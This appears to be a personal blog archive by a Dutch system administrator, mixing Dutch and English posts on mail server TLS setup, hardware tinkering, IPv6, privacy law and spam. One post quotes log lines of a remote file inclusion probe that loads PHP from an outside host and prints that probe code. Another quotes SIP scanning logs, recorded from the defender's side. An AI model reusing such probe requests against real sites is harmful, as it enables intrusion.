Which is normal challenge-response for CRAM-MD5 authentication. So my best guess is either trying to find valid accounts for other attacks in a way which does not hit a rate limiter (yet) which would mean a targeted attack or just a way to find an account for relaying spam.

Wardriving results 8 - 31 March: 4470 new networks with GPS locations.

Uitleg en achtergrond bij de CIOT teller die ik eerder noemde : Het CIOT opgeleukt - Jeroen van der Gun. Waar het rekenwerk nog even verder gaat: de kans dat van een gemiddelde Nederlander in 2009 telecommunicatie NAW gegevens door politie zijn opgevraagd: 17.8%. Dat is een hoop verdachten van misdrijven.

The upcoming shortage of IPv4 addresses and IPv6 seems to be a nice subject for some of the April-Fools items found today:

• AAISP first ISP to drop IPv4 Andrews & Arnold Ltd., UK ISP
• ICANN schaltet Rootserver ab - Alle IP-Adressen besetzt (German) where they will temporarily switch back to VideoText on pre-Internet computers.
• Internet addresses to void in 30 days - ComputerWeekly

There is a serious side: Within two years, shortage of IPv4 space will be for real.

Bij de volgende bijeenkomst van de hcc pc!gg netwerkgroep zit (natuurlijk) in de planning. De bijeenkomst van 5 juni zal volledig gaan over IPv6 en we gaan er diep op in, theorie en praktijk.

Enge teller bij Bits Of Freedom : Het aantal opvragingen bij het Centraal Informatiepunt Onderzoek Telecommunicatie (CIOT). Bewaarplicht telecomgegevens, Ciot opvragingen teller - Bits of Freedom.

Ok, sendmail locally on the laptop now works, but the next step is to get this to work from Thunderbird. I want Thunderbird to present the certificate to use the outgoing relay. To import a certificate into Thunderbird, I need to convert it to pkcs#12 format:

$ openssl pkcs12 -export -inkey thunderbird.pem -in machiavelli.idefix.net.crt -out thunderbird.p12 -name "Thunderbird op Machiavelli"
Enter pass phrase for thunderbird.pem:
Enter Export Password:
Verifying - Enter Export Password:

This gives me a .p12 file that Thunderbird understands so I can import it. But even when I set up Thunderbird to send the mail to the correct server on port 587 with TLS enabled it does not present its own certificate, resulting in a 'relaying denied' message (which is exactly what I want when the certificate is missing!). Time to search further. Maybe something in the certificate needs to match, but searching the Thunderbird help and on-line doesn't give hints.
As a backup I can let Thunderbird send to localhost:smtp and use the sendmail installation there to send it to the server (which it can) but then I can't see whether that worked when I close Thunderbird and disconnect the laptop. I'd rather have some visual conformation that mail is out the door.

Mirjam recently bought a new laptop and installed Linux on it (sofar nothing special) but we thought it would be nice if mail from the laptop would work from anywhere in the world. Using the information from Relaying with TLS in Sendmail, ubuntu sendmail and a bit of my own thinking this was not very hard. By default ubuntu hides the entire sendmail certificate creation and signing process, and I needed 'better' certificates signed by my own certificate authority. For the client side:

root@machiavelli:/etc/mail/tls# openssl req -new -key sendmail-common.key -out sendmail-client.csr 
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [NL]:
State or Province Name (full name) [Utrecht]:
Locality Name (eg, city) [Utrecht]:
Organization Name (eg, company) [idefix.net]:
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []:machiavelli.idefix.net
Email Address []:koos@machiavelli.idefix.net

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:

Next I signed this csr using the idefix.net CA, and put the resulting client certificate back in /etc/mail/tls/sendmail-client.crt. On the client, /etc/mail/submit.mc had to be changed to use tls and talk directly to the right machine:

FEATURE(`msp', `postbode.idefix.net', `MSA')
include(`/etc/mail/tls/starttls.m4')dnl

Now for the server side I also generated a csr for the name postbode.idefix.net and signed it. I changed /etc/mail/sendmail.mc to do this correctly:

include(`/etc/mail/tls/starttls.m4')dnl
dnl #
dnl # fix debian weird choice

define(`confTLS_SRV_OPTIONS', `')dnl

And updated the /etc/mail/access map to relay based on the data from the idefix.net certificate:

# SSL magic
CERTIssuer:/C=NL/ST=Utrecht/L=Utrecht/O=idefix.net/OU=Certificate+20Authority/CN=idefix.net+20CA/emailAddress=hostmaster@idefix.net     RELAY

Testing it was harder from home which is normally a trusted network.. it just lost that role for a few minutes. And I noticed that when I use mail -v it will ask the upstream mailhost to also be verbose. As noted in the linked article logging is sparse. One hint in the headers of the relayed mail is:

Received: from machiavelli.idefix.net (wireless-machiavelli.idefix.net [IPv6:2001:888:1011:1:21f:e1ff:fe45:2894])
        by kzdoos.xs4all.nl (8.14.2/8.14.2/Debian-2build1) with ESMTP id o2UKFH9
X002890
        (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=OK)
        for XXXXXXXXXXXXXXX; Tue, 30 Mar 2010 22:15:18 +0200

Teken dat het echt slecht gaat met de accu van mijn Dell D630 laptop:

[   20.075680] ACPI: Battery Slot [BAT0] (battery absent)
[   20.075762] ACPI: Battery Slot [BAT1] (battery absent)

Volgens acpi (en volgens de dell setup) zit er helemaal geen accu in. En dat terwijl ik nog een screenshot wilde maken van de gnome battery applet die beweerde dat de accu aan vervanging toe was.

En het is bij IDG uitgevers nogsteeds niet doorgekomen dat ik echt geen spam van ze wil. Na eerdere afmeldpogingen in oktober 2009 zie ik net weer vrolijk nieuwe spam van ze staan, die weer liegt dat ik een relatie met Computer!Totaal zou hebben. Die heb ik niet meer sinds januari 2005, dus langer dan de termijn van twee jaar waarop 'bestaande relatie' een wettelijk geaccepteerde reden is, en ik heb ook al vaker pogingen gedaan van IDG af te komen.
Tijd voor wat klachten naar de juiste adressen, onder andere www.spamklacht.nl en het advies naar de provider van de verzendende mailserver om een kniptang toe te passen om herhaling te voorkomen. En naar de redactie van computer!totaal, misschien willen die eens schrijven over de spam-ergernis die computer!totaal en IDG uitgevers veroorzaken.
Update 2010-03-29 In ieder geval reageert er een redacteur dat de afmelding doorgegeven wordt aan de juiste persoon.

Brilliant remark by Matt Blaze when he announces his twitter url:

140 is the new 1536.

(For those who don't get it: it's a massive nerdjoke)

Vandaag was er een bijeenkomst van de pcgg netwerkgroep en dit keer had ik vantevoren wat scripts gemaakt en getest om de theoretische throughput van het dlan netwerk (netwerk over stopcontact) te meten. We hebben er op de lokatie altijd problemen mee, maar toen we er mee begonnen was het stabieler(!) dan de wifi. Dus een keer meten hoe erg het was en hoe het zich in de loop van de dag ontwikkelde leek mij nuttig. Met wat perl kon de output van dlanlist gemasseerd worden om in een rrdtool database te passen en daar uit worden weer grafiekjes gebouwd op dagen dat de 'router' actief is.

• DLAN throughput zaterdag 20 Maart. De verbetering van 'intern' aan het begin is omdat we de videoprojector in een ander stopcontact gestoken hebben. Dat 'extern' eerder wegvalt is omdat de netwerkkabel uit de dlan adapter gezakt was. Daar helpt niets tegen...
• DLAN throughput donderdag 18 Maart. Ter vergelijking, de test van de scripts thuis.

Uiteindelijk blijft het dus moeilijk op deze lokatie.
Bij langer meten zonder veel dataverkeer blijven er trouwens continue dezelfde waarden uit dlanlist komen. Thuis heb ik dat opgelost door even iperf in te zetten. Op de bijeenkomsten komt dat verkeer vanzelf.

A little oops at the Telegraph. Now fixed: Large Hadron Collider breaks energy record which is interesting science news.

Weer een onhandigheid in de blijkbaar vernieuwde Eneco website : Als je op 'mijn eneco' klikt komt er een login scherm overheen maar zodra je muis weer daar vanaf beweegt (in mijn geval omdat ik de juiste gegevens in de password store ging zoeken) is het login scherm gelijk weer weg. De workaround is om naar de oudere versie van de mijn eneco inlogpagina te gaan.
En gelijk ergernisje 2: ook als ik ingelogd ben in de mijn eneco omgeving moet ik op het formulier om bovenstaand te melden alsnog al mijn gegevens invullen. Dus nu heb ik 2 problemen met de website gemeld.

I walked in this morning at work with some people looking at me expectingly. About the third person was nice enough to explain: home directories and mail were unavailable. A quick look showed me that the home directory server was waiting for the ldap server and the ldap server showed a kernel panic on the console. Strangely enough the root ldap object was still available so the monitoring system did not notice it.
Anyway, server systems should not wait for the systems administrator after a panic in my opinion, they should be available. So I looked it up, and indeed: Linux Kernel panic reboot explains how simple it is to change this setting. So I changed all servers at work to give up after a panic and reboot. That should help availability. I'm not interested in the intimate details of a panic, I want working ldap. Yes, as several people noted to me, there are ways in which this can lead to a reboot-loop, for example when the panic is file-system related. I'll take that risk when it will 'fix' all other problems.

unix - linux - storage unixfoo is good at linux and netapp knowledge. I browsed it for a while and found lots of interesting stuff.

Handy unix utility which I had a hard time remembering today: watch. For some reason this is part of procps /proc file system utilities. I used watch to keep an eye on the number of USB storage devices seen by a computer because I was busy hooking up 28 of them at a time to 4 USB hubs and sometimes things were flaky, resulting in the famous usb 7-3.3: device not accepting address 83, error -32. The solution was to unplug and replug the USB device. Trying another hub helped too.

$ watch 'lsusb -t 2>&1| grep -c 0x090c'

This showed the number of USB storage devices (of the type I used) detected so I could plug them in and see whether detection went right.

Dankzij een motie die Arda Gerkens (SP) en Martijn van Dam (PvdA) willen gaan indienen gaat demissionair minister Maria van der Hoeven van Economische Zaken onderzoeken of de overheid bij aanbestedingen verplicht moet vragen naar IPv6.
Goed nieuws voor IPv6 acceptatie. Soms moet een overheid de aanmerkelijke macht inzetten om de markt even een sturing te geven in een richting die later nuttig is voor diezelfde markt.
Bron: Kamerleden @ArdaG en @martijnvdam zijn top. Besteden ook aandacht aan niet-sexy maar wel belangrijke zaken - Twitterbericht Erik Huizer.

One of our users at work reported today that he noticed the 'Previous Versions' tab in windows explorer being active and showing what we think of as the snapshots of the NetApp fileserver. I tried it myself on the windows 2008 terminal server and it works as it should. As my boss noted this is a very important step: having snapshots available is one thing, but having them available in the standard interface which (experienced) windows users can use makes quite a difference. Helpdesk page about filesystem snapshots updated.

Looking for that quiet, remote and very, very, very sturdy place to call home? Try the Atlas F missile base, Adirondack Mtns, NY with features like

The original, heavy security doors are built to withstand a 2000 lb blast and are at the underground home entrance.

and

Huge doors open to a large tunnel that accesses the silo that has an additional 20,000 square feet of useable space with unlimited possibilities. The perfect getaway home, it has its own direct runway access, its climate controlled and is capable of withstanding a nuclear hit.

The Silo has a climate constant/approx. 58 degree earth ambient temperature. It is 52' diameter x 178' deep / 9 floor steel superstructure. Entire steel superstructure hangs from gigantic spring suspension system designed to absorb shock of a direct nuclear hit.

It's also easy to reach:

it is part of an exclusive airport subdivision on a (FAA approved) 2050' runway. (It is fully accessable by road too).

Cheap too: only 2.3 million US dollar. Found via It's WAR - lovelylisting

Met alle aankomende wijzigingen op het werk hebben we besloten om de spamfiltering uit te besteden aan de surfnet mailfilter dienst. Die worden er voor betaald om de filtering dagelijks bij te houden en wij hebben er straks minder tijd voor. Totnogtoe was het natuurlijk altijd onze 'eigen' mailsetup en konden we zelf de spamstats bijhouden, en dat verliezen we.
We hebben eerst students.cs.uu.nl omgezet en vanmorgen cs.uu.nl. In de logs van de studentenmailserver viel me opeens op dat de smtpd ratelimiting (anvil) van postfix aansloeg op de surfnet mailfilters dus ik heb de surfnet mailfilter adressen toegevoegd aan de smtpd_client_event_limit_exceptions setting in postfix. Bij cs.uu.nl gebruiken we postfix, al van toen het nog vmailer heette. In sendmail zou ik voor die IP blokken andere ratelimits kunnen zetten maar postfix heeft blijkbaar alleen de opties default en geen ratelimits.

I made a lolcat: How many times do I need to ask to put the seat down!

De adsl aansluiting is tijden stabiel op 7968/1024 ipv 8000/1024. Met alles rond de aankomende xs4all snelheidsverhoging wilde ik weten of dit de maximale snelheid was die uit de lijn wilde komen. Ik heb in de logs terug zitten graven en sinds de omschakeling van fast op interleaved is 7968 de standaard snelheid. Daarvoor was de downloadsnelheid een tijdje instabiel. Verder lijken de specs ok:

                                  Downstream        Upstream 
Margin       [dB]     :             10.5             20.0 
Attenuation  [dB]     :             19.0             11.5 
OutputPower  [dBm]    :             19.0             12.5 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18792             7968 
  Upstream            :             2415             1024 

Als ik zo lees over adsl interleaving kan het toch wel kloppen dat de snelheid nu 7968 kilobit/seconde is en ga ik straks naar een hogere snelheid (ergens in de buurt van 16000 kilobit/seconde).
Update : Later bedacht ik me dat ik ooit de adsl config opermode had aangepast naar multimode om stabieler te zijn met adsl1. De grens van adsl1 zit ergens rond 8000 kilobit. Dus geprobeerd:

[adsl]=>config opermode = multi_adsl2plus

En nu zijn de specs:

                                  Downstream        Upstream 
Margin       [dB]     :              6.0             18.0 
Attenuation  [dB]     :             20.0             11.5 
OutputPower  [dBm]    :              2.0             13.0 

Available Bandwidth                 Cells/s           Kbit/s 
  Downstream          :            18879             8005 
  Upstream            :             2426             1029 

Ik ben benieuwd wat het oplevert als er straks 16000/1024 (nee, nogsteeds geen upstream verbetering..) ingesteld wordt. Mocht het tegenvallen dan heb ik de optie om het adsl modem wat nu op zolder staat een stuk dichter bij het aansluitpunt te plaatsen.

Blast from the past today: I tried to subscribe to a surfnet mailinglist and the response had this bit of information:

Summary of resource utilization
-------------------------------
 CPU time:        0.000 sec                Device I/O:       19
 Overhead CPU:    0.016 sec                Paging I/O:      143
 CPU model:         2-CPU 2.5GHz Xeon L5420 6M (2048M)

I remember these lines in status messages when I first got in touch with mailing lists and listservers in 1992. Back then LISTSERV mostly ran on mainframes where this type of information at the end of a job was normal. Messages from LISTSERV used to have as subject back then "Output of job .." suggesting real batch processing.

Interesting weather this morning: snow started between 7 and 8, and it was nearly melted away again before 11. Overview on webcam.idefix.net Uithof archive Monday 8 March 2010.

Wardriving results 2 February - 7 March 2010: 4204 new networks with GPS locations according to WiGLE. Wardriving areas of the city I haven't visited in a while yields large numbers of new networks at the moment. I guess a lot of people have upgraded their wireless access-points.

Werk aan de ligfietsen dit weekend: bij Mirjam was er tijdens de afgelopen zomervakantie een spatbord afgelopen wat ik nog eens moest terugzetten na het repareren van de stukke popnagels (vervangen door m3 boutjes, inspiratie bij bevestiging spatborden vervangen - knurft.net). Bij mij was er iets ernstigers defect: de binnenkabel van de voorrem brak een paar dagen eerder. Ik heb die vervangen door een andere binnenkabel. Zondag zijn we een heel stuk gaan fietsen en toen ging ook de binnenkabel van de achterrem er aan. Op exact dezelfde manier: gebroken bij de schroef van de rem zelf. Ik had de kabels wat kort afgesteld om goed te kunnen remmen, maar daardoor maakte ik geen gebruik meer van de volle bocht van het draaiende deel van de schijfremklauwen. Dus maar even de fiets naar binnen en kijken of ik het kan repareren. Kabel vervangen, en toen ik de remklauw er af had liggen zag ik een stelschroefje op de remklauw 'L-PAD IN ⇒'. Daar eens aan gedraait maar dat zat nogal vast. Aan de andere kant een 'R-PAD in ⇒' en die wilde wel draaien. Daarmee blijk ik de fijnafstelling van de brakepads aan te kunnen passen. Dus ik heb de remklauw er weer opgeschroeft, de kabel beter afgesteld zodat de kans op breken minder is en vervolgens de brakepads aangedraaid. Nu onthouden dat ik ze eerst moet terugdraaien bij vervanging.

Searching for "idefix.net" to see whether it was listed in some overview of websites with certain vulnerable software I found this gem: idefix-net on Facebook Indonesia. I guess I have some sort of second career I never knew about.

It seems the Turkish provider ttnet.tr fell off the Internet for a few hours today. Since we volunteered ntp.cs.uu.nl for tr.pool.ntp.org the drop in traffic was very, very noticeable.

After a bit of searching I managed to get my Dell Latitude D630 laptop to use the audio buttons in fvwm.

Writing about security on your website has this interesting effect in the logs:

200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:35 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"
200.93.147.154 - - [04/Mar/2010:09:58:41 +0100] "GET /~koos/newstag.cgi/security%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zerozon.co.kr/data/eeng/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0"

The content of heheh.txt is predictable:

<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>

By pure coincidence there is a file http://zerozon.co.kr/data/eeng/id1.txt with the contents:

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

And that all looks very familiar: Fx29Shell php attack. This won't keep me from writing about security or amusing myself by browsing the logfiles. Maybe I'll find a fresh attack. This automated one is getting really boring.

Na de uitslag van de gemeenteraadsverkiezingen 2010 trok iemand de conclusie dat het zo niets meer gaat worden met Almere. Gratis mee te nemen dus bij de rommelmarktspullen.
Lokale screengrab, marktplaats had niet genoeg gevoel voor humor om de advertentie te laten staan.

Yes, took the step. The homepage lives at http://idefix.net/ and the old url redirects. And will have to keep doing that for at least 10 years. Or maybe more, the url for my homepage that was valid until August 2000 still has a working redirect. I'm not moving anything else because that would confuse me too much. So the base href in the html source has to stay.

A ~ in your homepage URL is somewhat very nineties so I started making http://idefix.net/ also point at my homepage and I moved the original content of that page to idefix.net history. I'm now wondering whether I should redirect http://idefix.net/~koos/ to the new location (migrating all links in for example search engines) or let both point at the same page.. or what.
I found some discussions on the tilde in the url. Jukka Korpela has an article Why tilde (~) should not be used in Web addresses (URLs) which explains why this unixism is a bad idea in the modern web and the explanation Get Clues from URLs notes:

Most servers use the ~ symbol to represent the personal directories of individuals.
If the URL contains a tilde then be aware that you are probably (although not definitely) looking at a personal page with personal opinions rather than an official site giving the official line.

Well, as I am the owner of idefix.net there should not be any difference between my opinion and the official opinion of the site.
At work we also got rid of the tildes ages ago so maybe I should just follow the sign of the times. Being good webmasters the old urls still work: http://www.cs.uu.nl/~koos/ will redirect to http://people.cs.uu.nl/koos/.
Enough rambling, this change was to me reason for a bump in the minor version number of the homepage.

In Duitsland is de Vorratsdatenspeicherung (bewaarplicht telecommunicatie gegevens) terdege teruggeroepen door het constitutioneel hof omdat de wetgeving in strijd is met de Duitse grondwet. In Duitsland is er wel een constitutioneel hof wat wetten kan toetsen en wat dat mag aan de hand van klachten van Duitse burgers.

Nu nog zoiets in Nederland... artikel 120 van de Nederlandse grondwet verbiedt een constitutioneel hof. Er ligt een wetsvoorstel van Femke Halsema van Groenlinks om de grondwet te wijzigen om dit deels mogelijk te maken. Maar dat moet nog een keer door de tweede en eerste kamer.

Links:

• BVerfG, 1 BvR 256/08 vom 2.3.2010, Absatz-Nr. (1 - 345) de officiële uitspraak (in juridisch Duits..)
• Pressemitteilung Nr. 11/2010 vom 2. März 2010 Persbericht van het Bundesverfassungsgericht
• Karlsruhe kippt Vorratsdatenspeicherung - Heise.de Heise.de (Duits)
• "Hoogste Duitse rechter: 'bewaarplicht is ongrondwettig'" - Bits of Freedom

Nedap stemcomputers zijn niet dood, ze ruiken alleen maar heel raar. Bij de gemeenteraadsverkiezingen morgen weer een oprisping: Toch elektronisch stemmen bij verkiezingen - nu.nl waarbij dus stemcomputers een 'schaduwverkiezing' draaien, men kan na het echte kiezen met het rode potlood ook nog stemmen via een stemcomputer die werkt met het bonnetjessysteem (stem wordt gelijk uitgedraaid op een bonnetje en in een stembus gedeponeerd). Het aantal 'echte' stemmen met potlood en het aantal stemmen op de stemcomputers hoeven dus niet overeen te komen, maar zou Nedap het aandurven dat een accountant de uitslagen van de computers en die van de computerbonnetjes natelt?

First peak at 5000 packets/second ntp traffic seen on ntp.cs.uu.nl. Still going strong under this load.

antiek aan de rol

Een NS DE3 treinstel passeert heel langzaam de overweg in de Huizingalaan in het spoor vanaf Utrecht Maliebaan naar de kruising bij Blauwkapel. Bij navraag blijkt het de DE3 nummer 114 van het spoorwegmuseum te zijn.

I just noticed something: the archive of webcam.idefix.net in the Uithof in Utrecht now covers a longer period (now 3 years and approximately 3 months) than the archive of webcam.idefix.net at the Beneluxlaan in Utrecht (which stopped just a bit over 2 years). How time flies.

Lots of phishing attempts for webmail accounts flying by, at the moment it seems popular to use webform hosters to ask for account credentials. I seem to miss a part of these. Probably my spamfilters being too good or something. But at work there are some people who know I am interested in new and recurring strains of Internet abuse so I still get interesting stuff forwarded to investigate. The latest catch advertised a dot.tk domain which inlined a webform from a tripod hosted site which was a copy of an emailmeform.com form and used emailmeform.com to process it and redirected to a generic thankyou form by a new zealand printer supplies company. It takes a bit of tracing and trying to solve such a puzzle and notify all parties about their role in the abuse.

By now a lot of people in the world are aware of the case of a US, Pennsylvania school was accused of using webcams in school-issued laptops to spy on students at home without their consent (via Slashdot). A lot of theories and weird stories are going around but I found a good technical explanation: The Spy at Harrington High - Stryde Hax who as a bystander and with his technical background has done a thorough analysis of the techniques used and the stance of the people involved in this matter. Good reading material for those who are actually interested in what was really happening.
The original story seems to be turning into this 'Only in America' story: School spying scandal gets even more bizarre - Slashdot:

The student in question that was disciplined for an "improper act" was apparently accused of either drug use or drug selling. Turns out he was eating Mike & Ike candy, not popping pills.

If you want to detect LANRev Agent on a system, Network Fingerprint for LANRev Agent - Stryde Hax has the answer.

SIP scanning is active again. Sandro Gauci came with a link to And the scanning just keeps on coming I checked the logs on 2 asterisk servers for recent break-in attempts and presto... from different IPs, but the pattern I saw before in trying to find insecure SIP servers:

[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"3776548202"<sip:3776548202@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"100"<sip:100@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"101"<sip:101@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:20] NOTICE[6890] chan_sip.c: Registration from '"102"<sip:102@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found


[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"952"<sip:952@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"953"<sip:953@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found
[Feb 21 10:09:28] NOTICE[6890] chan_sip.c: Registration from '"954"<sip:954@xxx.yyy.zzz.xxx>' failed for '96.57.107.3' - No matching peer found

No damage and no costs. The other server shows attempts to use the sip guest environment again:

[Feb 13 05:27:08] NOTICE[5710] chan_sip.c: Call from '' to extension '90442075821233' rejected because extension not found.
[Feb 13 05:27:27] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:27:38] NOTICE[5710] chan_sip.c: Call from '' to extension '0442076311117' rejected because extension not found.
[Feb 13 05:27:40] NOTICE[5710] chan_sip.c: Call from '' to extension '0011447850019298' rejected because extension not found.
[Feb 13 05:27:42] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:27:44] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.
[Feb 13 05:27:56] NOTICE[5710] chan_sip.c: Call from '' to extension '0000447956581268' rejected because extension not found.
[Feb 13 05:27:57] NOTICE[5710] chan_sip.c: Call from '' to extension '00011441628481177' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '900442075964032' rejected because extension not found.
[Feb 13 05:28:08] NOTICE[5710] chan_sip.c: Call from '' to extension '9011441252625280' rejected because extension not found.
[Feb 13 05:28:09] NOTICE[5710] chan_sip.c: Call from '' to extension '1442074370973' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '9442078493108' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '00000447889904142' rejected because extension not found.
[Feb 13 05:28:10] NOTICE[5710] chan_sip.c: Call from '' to extension '0001441383417547' rejected because extension not found.

This time with somewhat random looking phone numbers in the UK which aren't well-known to google.

De backup tapes van BBS Koos z'n Doos waren nog leesbaar, dus ik ben nu wat aan het spelen met wat van die tapes af kwam, en dat komt on-line op http://bbs.idefix.net/.

Todays xkcd is very amusing! As a system administrator I can imagine the need for making sure important infrastructure like the blog of a cat.

Friday, time for the Friday Afternoon URL page which you can also follow on twitter as @fridayaftURL to get fresh Friday Afternoon URLs in your twitter feed!

No license to rdesktop for me: I recently got a really weird error from rdesktop:

koos@leek:~$ rdesktop -M -g 1200x900 -d something terminalserver
Autoselected keyboard map en-us
disconnect: No valid license available.

Some searching found me: License to rdesktop. Indeed, setting a different hostname from my own hostname helps:

koos@leek:~$ rdesktop -M -g 1200x900 -d something -n leeks terminalserver
Autoselected keyboard map en-us
/users/koos/.rdesktop/licence.leeks.new: Permission denied
WARNING: Remote desktop does not support colour depth 24; falling back to 16

The license file error has to do with another workaround. But maybe the running out of licenses for 'leek' is because I never give licenses back. Why is all this software very busy with making sure money is made for its maker and not busy with helping the user.

The EFF has written an article Music Journalism is the New Piracy. The music industry seems to have the intention of thoroughly destroying itself, and that destruction will be celebrated by music fans worldwide. Found via Is There Any Way To Be A Music Blogger Without Risking Takedown? at Techdirt.
Or as Boingboing put it: Music industry to musicbloggers: there's no point in obeying the law.

Some actors are annoyed by being typecast in the same roles constantly, but some cities can be typecasted too: I watched WarGames (1983) yesterday and noted in a number of shots of Seattle it was raining. Now I'm watching Firewall (2006) and I think I haven't seen an outdoor scene yet without rain.
I visited Seattle myself and it's not that bad.

Na een lezing van Arnoud Engelfriet op de recente surfnet cert (computer emergency response teams) / ibo (informatie beveiligers in het onderwijs) conferentie ben ik eens door Internetrecht aan het bladeren en hij merkt iets op waar ik me ook vreselijk aan erger: Houd eens op met dat “Bron: Youtube” of “Bron: Flickr.com”!. Het heeft dus ten eerste het aspect dat beide sites het platform zijn en dat de originele auteur prima te vinden is (mijn ergernis) maar ook dat de licentie het niet altijd zomaar toestaat (afhankelijk van de eventuele nieuwswaarde van filmpje / foto).
En prompt zie ik een voorbeeld hoe het wel moet: hln.be geeft bij de eerste foto's van het treinongeluk in België keurig aan: twitpic.com user xxxx. Alleen heb ik het toen niet bewaard en zijn de foto's nu blijkbaar wel vervangen door persfoto's.

Even with my head clouded by a serious cold I had to create my lolcaption when I saw this picture and caption at ROFLRazzi Goes Romantic…ish. My take on it: Dingdong! .. Nobody home!

Sometimes even I use that other 'operating system' which in this particular case had no acrobat pdf reader. So I went to find it.. and it is a 45 meg (!!!) download which installs its own download-manager in Firefox. This download manager advertises for more downloads from Adobe and related companies. All this while Firefox has a perfect download manager of its own and it is all the equivalent of wget $url. To put it mildly: whisky tango foxtrot.

The first friday with the friday afternoon url page using Twitter @fridayaftURL to deal out the weekly dose of Friday afternoon fun.
Technically it all worked. But with myself and only a german url shortening service following it there isn't much of an audience yet! Time to do something about that.

I did some serious web services programming (in perl) and updated the scripts powering the Friday Afternoon URL page to post new urls via Twitter on Friday. You can follow @fridayaftURL to get a weekly dose of Friday afternoon stuff from all over the web. The urls are now stored in a (postgresql) database and on Friday a script runs which searches for new urls and posts them to Twitter using the Twitter api. When urls need to be shortened it uses the ln -s_ web service to shorten them.

I found the probable cause of the not so great power saving: when I installed the first new disk I also updated the bios. And the message I get when trying to load the powernow-k8 cpu driver is:

powernow-k8: Found 1 AMD Athlon(tm) Dual Core Processor 4850e processors (2 cpu cores) (version 2.20.00)
powernow-k8: MP systems not supported by PSB BIOS structure
powernow-k8: MP systems not supported by PSB BIOS structure

So the cpu keeps running at maximum speed without throttling. Searching for the error message finds Ubuntu Bug #33116: powernow-k8 refuses to load and Ubuntu Bug #398109: powernow-k8: Your BIOS does not provide ACPI _PSS objects in a way that Linux understands suggests that I need to check the bios settings to enable "Cool'n'Quiet", enable ACPI APIC and disable MCP61 ACPI HPET Table. That's planned for the next hardware changes.

Ok, I'm usually not the flash and embedding type, but after a bit of trying this one is nice:

My first association when I heard that jingle...

I noticed that the new Western Digital WD15EADS disk spun down way too fast. After some serious testing I found: when I set the "Advanced Power Management" level (using hdparm -B) to 127 or less the "standby (spindown) timeout" (set using hdparm -S) is ignored and the drive spins down after about 5 8 seconds of inactivity. Way too soon when playing a movie, with mplayer the movie stalls about every 10 seconds because a new bit of movie has to be read from disk which causes another start/stop. The smartctl start/stop counter goes up at the same rate. Feels like a firmware bug to me or a difference of opinion between hdparm and the disk. But the hdparm report suggests that these settings should work on the disk:

ATA device, with non-removable media
        Model Number:       WDC WD15EADS-00S2B0                     
        Firmware Revision:  04.05G04

        Standby timer values: spec'd by Standard, with device specific minimum
        Advanced power management level: 126

           *    Power Management feature set

I asked Western Digital customer help about this but the first (standard?) answer is from Support for WD products in LINUX or UNIX which comes down to "we don't support anything else than jumper settings for these operating systems".

A lot of further searching with google suggests to me that the 'IntelliPark' feature is causing the drive to park its heads after 8 seconds of inactivity which is not a useful default when streaming video from it with a reasonable cache. And the 'Load Cycle Count' will go up fast, which may result in the drive reaching the 'suggested maximum' within a year. I don't need to test the warranty that fast.

As a workaround I set the Advanced Power Management level back to 128 and installed spindown which is a utility which watches the disk activity from userspace and issues a spindown command when no activity (from /proc/diskstats, so for linux at the device level) was measured over the configured period of time. Now it spins down when the filesystems have been idle for 10 minutes which is a lot more usable.
Update: Official answer from Western Digital customer help is that it's not possible to change this 8 second timeout. So I'll stick to the spindown solution.

The resulting power save from adding a new sata disk, moving the data and removing the old pata disks is not spectacular (yet): the 5 pata disks (all with activated automatic spindown) had the UPS at a 40% load, the current 2 sata and 2 pata disks (also with automatic spindown) have the UPS at a 42% load. It'll be interesting to see what happens when the 2 pata disks can be removed. The main original idea was to save a bit of power and make the system less complicated, let's see if that first part works out in the end.
Update: Found the cause of the not so great power saving: probably the recent bios update.

Filesystems have been moved to the new huge sata disk in home server greenblatt and I found time this evening to remove three old ones. There may be a race condition in the startup scripts where lvm2 is not completely up and running when the filesystems are mounted from the fstab but I saw that happen only once.

